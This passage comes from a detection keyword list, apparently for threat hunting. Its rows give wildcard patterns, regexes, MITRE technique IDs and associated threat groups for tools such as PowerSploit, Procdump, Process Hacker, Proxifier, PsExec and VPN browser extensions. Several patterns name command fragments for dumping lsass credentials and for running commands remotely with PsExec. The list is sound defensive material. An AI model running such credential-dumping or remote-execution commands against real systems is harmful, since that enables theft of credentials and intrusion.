assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-TimedScreenshot*",".{0,1000}Get\-TimedScreenshot.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-UnquotedService*",".{0,1000}Get\-UnquotedService.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*jljopmgdobloagejpohpldgkiellmfnc*",".{0,1000}jljopmgdobloagejpohpldgkiellmfnc.{0,1000}","greyware_tool_keyword","PP VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://www.premiumize.me/*",".{0,1000}https\:\/\/www\.premiumize\.me\/.{0,1000}","greyware_tool_keyword","premiumize.me","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Collection","www.premiumize.me","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*akkbkhnikoeojlhiiomohpdnkhbkhieh*",".{0,1000}akkbkhnikoeojlhiiomohpdnkhbkhieh.{0,1000}","greyware_tool_keyword","Prime VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*jplnlifepflhkbkgonidnobkakhmpnmh*",".{0,1000}jplnlifepflhkbkgonidnobkakhmpnmh.{0,1000}","greyware_tool_keyword","Private Internet Access","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://privnote.com/*",".{0,1000}https\:\/\/privnote\.com\/.{0,1000}","greyware_tool_keyword","privnote.com","temporary notes service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - 
TA0009","N/A","Akira","Collection","https://github.com/Casualtek/Ransomchats/blob/4a25ac6ad165a4e600aeb72718c3ad41e8f6ce3a/Akira/20240620.json#L31C27-L31C48","1","1","N/A","downloading files url","5","5","410","38","2024-08-30T10:51:23Z","2023-05-02T16:17:48Z" "* -ma lssas.exe*",".{0,1000}\s\-ma\slssas\.exe.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Procdump.zip*",".{0,1000}\/Procdump\.zip.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Procdump.zip*",".{0,1000}\\Procdump\.zip.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Sysinternals\ProcDump\*",".{0,1000}\\SOFTWARE\\Sysinternals\\ProcDump\\.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential 
Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*\Users\Public\*.dmp*",".{0,1000}\\Users\\Public\\.{0,1000}\.dmp.{0,1000}","greyware_tool_keyword","procdump","Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","false positive risks","10","10","N/A","N/A","N/A","N/A" "*\lsass*procdump**",".{0,1000}\\\lsass\<\/Data\>\.{0,1000}procdump.{0,1000}\<\/Data\>.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","pipe connect ED 18 sysmon","10","10","N/A","N/A","N/A","N/A" "*>ProcDump<*",".{0,1000}\>ProcDump\<.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A" "*procdump*lsass*",".{0,1000}procdump.{0,1000}lsass.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*procdump*lsass*",".{0,1000}procdump.{0,1000}lsass.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential 
Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*procdump.exe* -ma*",".{0,1000}procdump\.exe.{0,1000}\s\-ma.{0,1000}","greyware_tool_keyword","Procdump","full dump with procdump (often used to dump lsass)","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*procdump64*lsass*",".{0,1000}procdump64.{0,1000}lsass.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*procdump64.exe*",".{0,1000}procdump64\.exe.{0,1000}","greyware_tool_keyword","Procdump","usage of procdump (often used to dump lsass)","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/processhacker-*-bin.zip*",".{0,1000}\/processhacker\-.{0,1000}\-bin\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/processhacker/files/latest/download*",".{0,1000}\/processhacker\/files\/latest\/download.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Process Hacker 2\*",".{0,1000}\\Process\sHacker\s2\\.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*processhacker-*-sdk.zip*",".{0,1000}processhacker\-.{0,1000}\-sdk\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*processhacker-*-setup.exe*",".{0,1000}processhacker\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*processhacker-*-src.zip*",".{0,1000}processhacker\-.{0,1000}\-src\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*ProcessHacker.exe*",".{0,1000}ProcessHacker\.exe.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*ProcessHacker.sln*",".{0,1000}ProcessHacker\.sln.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Procmon.exe*",".{0,1000}\\AppData\\Local\\Temp\\Procmon\.exe.{0,1000}","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Discovery","N/A","1","1","N/A","greyware tool - risks of False positive !","4","7","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Procmon64.exe*",".{0,1000}\\AppData\\Local\\Temp\\Procmon64\.exe.{0,1000}","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Discovery","N/A","1","1","N/A","greyware tool - risks of False positive !","4","7","N/A","N/A","N/A","N/A" "*nhfjkakglbnnpkpldhjmpmmfefifedcj*",".{0,1000}nhfjkakglbnnpkpldhjmpmmfefifedcj.{0,1000}","greyware_tool_keyword","Pron VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*aakchaleigkohafkfjfjbblobjifikek*",".{0,1000}aakchaleigkohafkfjfjbblobjifikek.{0,1000}","greyware_tool_keyword","ProxFlow","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* stop 
ProxifierDrv*",".{0,1000}\sstop\sProxifierDrv.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*/Proxifier.app/Contents/MacOS/Proxifier*",".{0,1000}\/Proxifier\.app\/Contents\/MacOS\/Proxifier.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*/Proxifier.exe*",".{0,1000}\/Proxifier\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*/Proxifier/Proxifier.app/*",".{0,1000}\/Proxifier\/Proxifier\.app\/.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*/ProxifierPE.zip*",".{0,1000}\/ProxifierPE\.zip.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*/ProxifierSetup.exe*",".{0,1000}\/ProxifierSetup\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" 
"*\AppData\Local\Temp\*\Proxifier PE\*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\Proxifier\sPE\\.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Proxifier PE\*",".{0,1000}\\AppData\\Local\\Temp\\Proxifier\sPE\\.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\Proxifier Service Manager.lnk*",".{0,1000}\\Proxifier\sService\sManager\.lnk.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\Proxifier.exe*",".{0,1000}\\Proxifier\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\Proxifier.lnk*",".{0,1000}\\Proxifier\.lnk.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\ProxifierDrv.sys*",".{0,1000}\\ProxifierDrv\.sys.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense 
Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\ProxifierPE.zip*",".{0,1000}\\ProxifierPE\.zip.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\ProxifierSetup.exe*",".{0,1000}\\ProxifierSetup\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\ProxifierSetup.tmp*",".{0,1000}\\ProxifierSetup\.tmp.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\ProxifierShellExt.dll*",".{0,1000}\\ProxifierShellExt\.dll.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\ProxyChecker.exe*",".{0,1000}\\ProxyChecker\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*\SOFTWARE\WOW6432Node\Microsoft\Tracing\Proxifier_*",".{0,1000}\\SOFTWARE\\WOW6432Node\\Microsoft\\Tracing\\Proxifier_.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered 
Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","#registry","N/A","8","9","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\Proxifier*",".{0,1000}\\Start\sMenu\\Programs\\Proxifier.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*>Proxifier Setup<*",".{0,1000}\>Proxifier\sSetup\<.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","#description","N/A","8","9","N/A","N/A","N/A","N/A" "*com.initex.proxifier.v3.macos*",".{0,1000}com\.initex\.proxifier\.v3\.macos.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*http://www.proxifier.com/distr/last_versions/ProxifierMac*",".{0,1000}http\:\/\/www\.proxifier\.com\/distr\/last_versions\/ProxifierMac.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*http://www.proxifier.com/distr/last_versions/ProxifierPortable*",".{0,1000}http\:\/\/www\.proxifier\.com\/distr\/last_versions\/ProxifierPortable.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense 
Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*Program Files (x86)\Proxifier*",".{0,1000}Program\sFiles\s\(x86\)\\Proxifier.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*padekgcemlokbadohgkifijomclgjgif*",".{0,1000}padekgcemlokbadohgkifijomclgjgif.{0,1000}","greyware_tool_keyword","Proxy SwitchyOmega","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*dpplabbmogkhghncfbfdeeokoefdjegm*",".{0,1000}dpplabbmogkhghncfbfdeeokoefdjegm.{0,1000}","greyware_tool_keyword","Proxy SwitchySharp","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*llbhddikeonkpbhpncnhialfbpnilcnc*",".{0,1000}llbhddikeonkpbhpncnhialfbpnilcnc.{0,1000}","greyware_tool_keyword","ProxyFlow","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* 
-accepteula -nobanner -d cmd.exe /c *",".{0,1000}\s\-accepteula\s\-nobanner\s\-d\scmd\.exe\s\/c\s.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*.exe -i -s cmd.exe*",".{0,1000}\.exe\s\-i\s\-s\scmd\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. 
or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\PsExec.exe*",".{0,1000}\\PsExec\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Sysinternals\PsExec\EulaAccepted*",".{0,1000}\\SOFTWARE\\Sysinternals\\PsExec\\EulaAccepted.{0,1000}","greyware_tool_keyword","psexec","PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. 
